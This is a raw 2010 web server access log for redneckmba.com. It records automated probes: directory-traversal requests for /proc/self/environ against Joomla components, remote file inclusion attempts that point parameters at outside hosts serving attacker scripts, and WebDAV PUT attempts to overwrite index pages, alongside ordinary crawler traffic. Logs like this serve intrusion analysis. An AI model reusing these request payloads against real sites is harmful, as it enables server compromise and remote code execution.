92.43.201.28 - - [26/Jul/2010:05:06:04 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:05:06:18 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:05:06:18 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
76.242.100.234 - - [26/Jul/2010:05:06:37 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:05:07:05 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:05:07:06 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:05:08:02 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:05:08:02 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
76.242.100.234 - - [26/Jul/2010:05:08:29 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:05:08:33 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
92.43.201.28 - - [26/Jul/2010:05:08:33 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
76.13.114.105 - - [26/Jul/2010:05:09:44 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.242.100.234 - - [26/Jul/2010:05:13:11 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
76.242.100.234 - - [26/Jul/2010:05:13:11 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
76.242.100.234 - - [26/Jul/2010:05:14:55 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
76.242.100.234 - - [26/Jul/2010:05:16:15 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
76.242.100.234 - - [26/Jul/2010:05:16:15 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
76.242.100.234 - - [26/Jul/2010:05:18:32 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
76.242.100.234 - - [26/Jul/2010:05:18:32 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
76.242.100.234 - - [26/Jul/2010:05:19:45 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
76.242.100.234 - - [26/Jul/2010:05:19:51 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
222.124.193.12 - - [26/Jul/2010:05:23:48 -0700] "GET /logs/access.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
222.124.193.12 - - [26/Jul/2010:05:23:49 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
222.124.193.12 - - [26/Jul/2010:05:23:49 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
222.124.193.12 - - [26/Jul/2010:05:23:52 -0700] "GET /logs/access.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
222.124.193.12 - - [26/Jul/2010:05:23:53 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
222.124.193.12 - - [26/Jul/2010:05:23:53 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
222.124.193.12 - - [26/Jul/2010:05:23:59 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
222.124.193.12 - - [26/Jul/2010:05:24:00 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
222.124.193.12 - - [26/Jul/2010:05:24:01 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
67.218.116.168 - - [26/Jul/2010:05:24:22 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.redneckmba.com"
86.109.96.188 - - [26/Jul/2010:05:31:07 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
86.109.96.188 - - [26/Jul/2010:05:31:07 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
86.109.96.188 - - [26/Jul/2010:05:31:07 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.52.48.66 - - [26/Jul/2010:05:32:10 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.52.48.66 - - [26/Jul/2010:05:32:10 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
81.208.34.38 - - [26/Jul/2010:05:32:13 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
81.208.34.38 - - [26/Jul/2010:05:32:13 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
81.208.34.38 - - [26/Jul/2010:05:32:13 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.52.48.66 - - [26/Jul/2010:05:32:30 -0700] "GET /logs/access_100329.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
178.95.38.222 - - [26/Jul/2010:05:34:17 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "www.redneckmba.com"
178.95.38.222 - - [26/Jul/2010:05:34:18 -0700] "GET / HTTP/1.0" 200 763 "http://www.redneckmba.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "www.redneckmba.com"
76.13.114.105 - - [26/Jul/2010:05:35:48 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.205 - - [26/Jul/2010:05:41:16 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [26/Jul/2010:05:51:59 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [26/Jul/2010:06:00:53 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.195.114.41 - - [26/Jul/2010:06:05:41 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
67.195.114.41 - - [26/Jul/2010:06:05:30 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
76.13.114.105 - - [26/Jul/2010:06:27:55 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.195.114.41 - - [26/Jul/2010:06:30:14 -0700] "GET /logs/?S=D HTTP/1.0" 200 2066 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
66.163.171.205 - - [26/Jul/2010:06:33:51 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:51 -0700] "PUT /index.htm HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:40:02 -0700] "PUT /index.html HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:51 -0700] "PUT /welcome.htm HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:51 -0700] "PUT /welcome.html HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:40:02 -0700] "PUT /home.htm HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:40:02 -0700] "PUT /home.html HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:51 -0700] "PUT /index.aspx HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:40:03 -0700] "PUT /defaut.aspx HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:52 -0700] "PUT /home.aspx HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:40:03 -0700] "PUT /default.htm HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:52 -0700] "PUT /default.html HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:52 -0700] "PUT /index.asp HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:52 -0700] "PUT /main.htm HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:52 -0700] "PUT /iisstart.asp HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:53 -0700] "PUT /main.html HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:53 -0700] "PUT /main.asp HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:53 -0700] "PUT /main.aspx HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:53 -0700] "PUT /default.asp HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:40:04 -0700] "PUT /home.asp HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:53 -0700] "PUT /index.php HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:53 -0700] "PUT /default.php HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:54 -0700] "PUT /home.php HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:54 -0700] "PUT /iisstart.asp HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:40:05 -0700] "PUT /localstart.asp HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:54 -0700] "PUT /Entrada.asp HTTP/1.1" 403 - "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1" "www.redneckmba.com"
200.98.197.72 - - [26/Jul/2010:06:39:54 -0700] "GET / HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.redneckmba.com"
67.202.40.158 - - [26/Jul/2010:06:52:20 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "redneckmba.com"
76.13.114.106 - - [26/Jul/2010:06:53:19 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
77.222.34.35 - - [26/Jul/2010:06:55:12 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:06:55:12 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:06:55:12 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:06:55:26 -0700] "GET /logs/access.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:06:55:26 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:06:55:26 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:06:55:27 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:06:55:27 -0700] "GET /logs/access.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:06:55:27 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:06:55:32 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:06:55:32 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:06:55:32 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:06:59:19 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:06:59:19 -0700] "GET /logs/access.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:06:59:19 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:06:59:41 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:06:59:41 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:06:59:41 -0700] "GET /logs/access.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:07:03:51 -0700] "GET /logs/access.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:07:03:51 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:07:03:51 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:07:03:51 -0700] "GET /logs/access.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:07:03:51 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:07:03:51 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.195 - - [26/Jul/2010:07:05:26 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
77.222.34.35 - - [26/Jul/2010:07:10:44 -0700] "GET /logs/access.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:07:10:44 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:07:10:44 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:07:11:03 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:07:11:03 -0700] "GET /logs/access.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:07:11:03 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:07:13:30 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:07:13:30 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:07:13:30 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:07:13:42 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:07:13:42 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:07:13:42 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
